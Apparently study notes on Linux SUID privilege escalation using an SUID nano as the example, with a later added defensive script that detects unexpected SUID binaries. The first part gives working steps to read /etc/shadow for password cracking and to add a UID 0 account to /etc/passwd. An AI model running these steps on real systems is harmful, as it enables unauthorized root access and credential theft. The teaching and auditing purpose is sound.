- SUID allows a file to be executed with the permission level of the file owner.
- Files with SUID have an `s` bit set in their mode string, showing their special permission level.
- `find / -type f -perm -4000 2>/dev/null` lists files that have the SUID bit set.
- `gtfobins.github.io` has a SUID button that filters binaries known to be exploitable when the SUID bit is set.

# Example: SUID set on `nano`

- Let's say `nano` has the SUID bit set and is owned by root.
- If you run it, you're editing files as root, even if you're just a normal user.

# Option 1: Read `/etc/shadow` and crack passwords

```bash
# 1. Open /etc/shadow (nano runs as root, so it is readable) and save a copy as shadow.txt
nano /etc/shadow

# 2. Also copy /etc/passwd to passwd.txt
nano /etc/passwd

# 3. Use the unshadow tool to merge the two copies
unshadow passwd.txt shadow.txt > passwords.txt

# 4. Use John the Ripper to try cracking the passwords
john passwords.txt --wordlist=/path/to/wordlist
```

# Option 2: Add a new root user

```bash
# 1. Generate a password hash
openssl passwd -1 yourpassword

# 2. Use nano to edit /etc/passwd and add a new line.
#    UID 0 and GID 0 make newuser have root privileges.
newuser:$1$hash...$:0:0:root:/root:/bin/bash

# 3. Switch to that user
su newuser
```
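The `find` one-liner above is the enumeration step; the defensive counterpart is to keep a baseline of the SUID binaries a host is expected to have and alert when that set changes, since an editor like `nano` gaining the SUID bit is exactly the kind of drift that should be caught. The script below is an added example, not part of the original notes: `find_suid` wraps the same `find -perm -4000` check, `suid_snapshot` records a baseline, and `suid_drift` reports any SUID file not on it. The baseline path `/var/lib/suid-baseline` and the `--audit` flag are assumptions chosen for this example.

```bash
#!/bin/sh
# Added example (not from the original notes): audit SUID binaries under a
# directory tree and report any that are not on an approved baseline.
# Assumptions: POSIX sh; find supports -perm -4000; the baseline is a plain
# text file with one absolute path per line.

# List every regular file under $1 that has the SUID bit set, sorted.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Record the current SUID set under $1 into baseline file $2.
suid_snapshot() {
    find_suid "$1" > "$2"
}

# Print SUID files under $2 that do not appear in baseline file $1.
# Output is empty when nothing has drifted from the baseline.
suid_drift() {
    baseline="$1"
    root="$2"
    find_suid "$root" | while IFS= read -r path; do
        # -F: literal match, -x: whole line, -q: quiet; print only on miss
        grep -Fxq -- "$path" "$baseline" || printf '%s\n' "$path"
    done
}

# Stand-alone usage: ./suid-audit.sh --audit [baseline]
# First run writes the baseline; later runs exit 1 on drift.
# (The default baseline path is an assumption; choose one for your hosts.)
if [ "${1:-}" = "--audit" ]; then
    baseline="${2:-/var/lib/suid-baseline}"
    if [ ! -f "$baseline" ]; then
        suid_snapshot / "$baseline"
        echo "baseline written to $baseline"
    else
        drift=$(suid_drift "$baseline" /)
        if [ -n "$drift" ]; then
            echo "unexpected SUID binaries:"
            echo "$drift"
            exit 1
        fi
        echo "no SUID drift"
    fi
fi
```

Run the audit from cron or a configuration-management check; when it flags something like `/usr/bin/nano`, the fix is `chmod u-s` on that file after confirming it is not a legitimate need. Two caveats: the baseline itself must be stored where an unprivileged user cannot edit it, and the listing only reflects what the local kernel reports, so it complements rather than replaces file-integrity monitoring.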